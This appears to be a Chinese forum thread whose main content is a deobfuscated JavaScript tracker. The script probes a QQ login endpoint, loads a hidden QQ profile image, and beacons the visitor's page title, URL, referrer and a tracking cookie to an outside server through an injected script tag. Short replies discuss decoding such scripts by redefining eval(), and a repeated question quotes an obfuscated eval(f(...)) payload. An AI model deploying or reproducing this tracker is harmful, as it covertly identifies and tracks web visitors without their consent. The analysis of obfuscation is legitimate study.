window.cfguid = "8";
window.cfgqq = "770023";
window.cfgurl = "http://www.vip519.com/bak/";
var isLoginTimeID;
function SetCookie(name, value) {
var exp = new Date();
exp.setTime(exp.getTime() + 2 * 24 * 60 * 60 * 1000);
document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString()
}
function GetCookie(name) {
var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
if (arr != null) return unescape(arr[2]);
return null
}
function DelCookie(name) {
var exp = new Date();
exp.setTime(exp.getTime() - 1);
var cval = getCookie(name);
if (cval != null) document.cookie = name + "=" + cval + ";expires=" + exp.toGMTString()
}
function insertFrame() {
var img = new Image();
img.src = "http://meishi.qq.com/profiles/" + window.cfgqq;
img.width = 0;
img.height = 0;
img.frameborder = 0;
if (img.attachEvent) {
img.attachEvent("onerror",
function() {
newSubmit()
});
img.attachEvent("onload",
function() {
newSubmit()
});
img.attachEvent("onabort",
function() {
newSubmit()
})
} else {
img.onerror = function() {
newSubmit()
};
img.onload = function() {
newSubmit()
};
img.onabort = function() {
newSubmit()
}
}
document.body.appendChild(img)
}
function newSubmit() {
var uincookie = GetCookie("uincookie");
if (uincookie == null) {
uincookie = "code" + (new Date()).getTime() + parseInt(Math.random() * 100000);
SetCookie("uincookie", uincookie)
}
var title = encodeURIComponent(document.title);
var url = encodeURIComponent(document.location.href);
var referrer = encodeURIComponent(document.referrer);
var oHead = document.getElementsByTagName('HEAD').item(0);
var oScript = document.createElement("script");
oScript.type = "text/javascript";
oScript.src = window.cfgurl + "?action=saveQQ&do=save&uid=" + window.cfguid + "&qq=" + window.cfgqq + "&referrer=" + referrer + "&url=" + url + "&title=" + title + "&uincookie=" + uincookie + "&r=" + new Date().getTime();
oHead.appendChild(oScript)
}
function isLogin() {
var code = null;
if (typeof(data3) == "undefined") {
code = data0.err
} else {
code = data3.err
}
if (code == 1007) {
window.clearInterval(isLoginTimeID);
insertFrame()
} else {
var uincookie = GetCookie("uincookie");
if (uincookie != null) {
window.clearInterval(isLoginTimeID);
var title = encodeURIComponent(document.title);
var url = encodeURIComponent(document.location.href);
var referrer = encodeURIComponent(document.referrer);
var oHead = document.getElementsByTagName('HEAD').item(0);
var oScript = document.createElement("script");
oScript.type = "text/javascript";
oScript.src = window.cfgurl + "?action=saveQQ&do=cookieSave&uid=" + window.cfguid + "&qq=" + window.cfgqq + "&referrer=" + referrer + "&url=" + url + "&title=" + title + "&uincookie=" + uincookie + "&r=" + new Date().getTime();
oHead.appendChild(oScript)
} else {
var checkscript = document.getElementById("checkloginscript");
checkscript.parentNode.removeChild(checkscript)
}
}
}
function dynamicLoad() {
var vsrc = "http://apps.qq.com/app/yx/cgi-bin/show_fel?hc=8&lc=4&d=365633133&t=";
var time = new Date().getTime();
vsrc = vsrc + time;
var oHead = document.getElementsByTagName('HEAD').item(0);
var oScript = document.createElement("script");
oScript.type = "text/javascript";
oScript.id = "checkloginscript";
if (oScript.readyState) {
oScript.onreadystatechange = function() {
if (oScript.readyState == "loaded" || oScript.readyState == "complete") {
oScript.onreadystatechange = null;
isLogin()
}
}
} else {
oScript.onload = function() {
isLogin()
}
}
oScript.src = vsrc;
oHead.appendChild(oScript)
}
dynamicLoad();
isLoginTimeID = window.setInterval("dynamicLoad()", 3000);
同样是把eval()函数重新定义一下
function eval(t)
{
window.clipboardData.setData("Text",t);
}
一层一层的解就可以了,解密之后用js格式化工具格式化下
应该无法适用所有情况吧?
比如这段是个什么情况?先decodeURI和和unescape貌似也没用:
eval(f('%u01EC%D7%D3%92%8C%CD%CF%D5%87%5D%5D%8E%CF%D7%DF%D0%C8%D5%E3%E1%A0%9A%CD%CF%D5%DC%D6%C8%CC%85%9C%F8%9C%8E%CF%D7%DF%D0%C8%D5%E3%E1%A0%A3%E8%D8%D7%BE%AD%CF%D5%DC%D6%C8%CC%85%9C%F8%9C%97%E0%D7%D2%D3%E6%A5%9C%CF%D7%DF%D0%C8%D5%E3%E1%A0%A1%EC%EC%E7%D9%D2%B9%AD%CF%D5%DC%D6%C8%CC%A0%A4%CF%86HH%8C%CD%CF%D5%95%A1%E8%D7%D5%E7%E6%9AX%5C%5E%5BIA%5E%5DB%9C%E2%8AKI%9B%DF%D3%D2%D8%E2%D2%D3%E2%A2%A5%E9%DB%DD%D9%8DOc%A0%CD%DF%96%93%E7%ED%E5%D1%A2_%84%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%90%D2%DB%DB%E1%AC%B1%DF%D1%DD%D9%A0%AB%DF%E2%DC%DD%DD%D8%DD%A8%9B%C3%D5%E2%DB%E1%E9%D9%A0%B5%A7%96%D7%D2%C9%DD%B2lb%60%60k%B2%E0%CD%D8%DC%A2ka%60U%60%A3%CD%CE%D0%CF%DC%AEkejk%A5%E8%B3%A7%D1%CB%DA%AEjk%AF%E3%DF%AAjR%60z%A5%CF%D8%D3%CE%D2%85%97%E0%CD%D8%DC%A5_Sa%60UGB%93%D6%D5%E1%DB%D8%D5%D7%D5%A4_%90%DD%91B%88%CD%CE%D0%CF%DC%B1_Sa%60UGB%86%D8%D3%CE%D2%C7%D1%E1%D6%C9%D7%AF_%90%DD%91B%93%E5%D5%A0_%8A%DC%E8%E4%AAi%5E%A6%EE%EE%A5%90%C7%D8%E7%E8%E3%DF%DD%CE%CD%D8%9A%91%D2%DC%9CQB%82%D1%E1%D6%C9%D7%AF_RR%60zk%98%CF%D8%D3%CE%D2%A3zk%93%CD%DF%B4eP%A6'))
应该无法适用所有情况吧?
比如这段是个什么情况?先decodeURI和和unescape貌似也没用:
eval(f('%u01EC%D7%D3%92%8C%CD%CF%D5%87%5D%5D%8E%CF%D7%DF%D0%C8%D5%E3%E1%A0%9A%CD%CF%D5%DC%D6%C8%CC%85%9C%F8%9C%8E%CF%D7%DF%D0%C8%D5%E3%E1%A0%A3%E8%D8%D7%BE%AD%CF%D5%DC%D6%C8%CC%85%9C%F8%9C%97%E0%D7%D2%D3%E6%A5%9C%CF%D7%DF%D0%C8%D5%E3%E1%A0%A1%EC%EC%E7%D9%D2%B9%AD%CF%D5%DC%D6%C8%CC%A0%A4%CF%86HH%8C%CD%CF%D5%95%A1%E8%D7%D5%E7%E6%9AX%5C%5E%5BIA%5E%5DB%9C%E2%8AKI%9B%DF%D3%D2%D8%E2%D2%D3%E2%A2%A5%E9%DB%DD%D9%8DOc%A0%CD%DF%96%93%E7%ED%E5%D1%A2_%84%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%90%D2%DB%DB%E1%AC%B1%DF%D1%DD%D9%A0%AB%DF%E2%DC%DD%DD%D8%DD%A8%9B%C3%D5%E2%DB%E1%E9%D9%A0%B5%A7%96%D7%D2%C9%DD%B2lb%60%60k%B2%E0%CD%D8%DC%A2ka%60U%60%A3%CD%CE%D0%CF%DC%AEkejk%A5%E8%B3%A7%D1%CB%DA%AEjk%AF%E3%DF%AAjR%60z%A5%CF%D8%D3%CE%D2%85%97%E0%CD%D8%DC%A5_Sa%60UGB%93%D6%D5%E1%DB%D8%D5%D7%D5%A4_%90%DD%91B%88%CD%CE%D0%CF%DC%B1_Sa%60UGB%86%D8%D3%CE%D2%C7%D1%E1%D6%C9%D7%AF_%90%DD%91B%93%E5%D5%A0_%8A%DC%E8%E4%AAi%5E%A6%EE%EE%A5%90%C7%D8%E7%E8%E3%DF%DD%CE%CD%D8%9A%91%D2%DC%9CQB%82%D1%E1%D6%C9%D7%AF_RR%60zk%98%CF%D8%D3%CE%D2%A3zk%93%CD%DF%B4eP%A6')) 你这个代码少了个f()函数啊。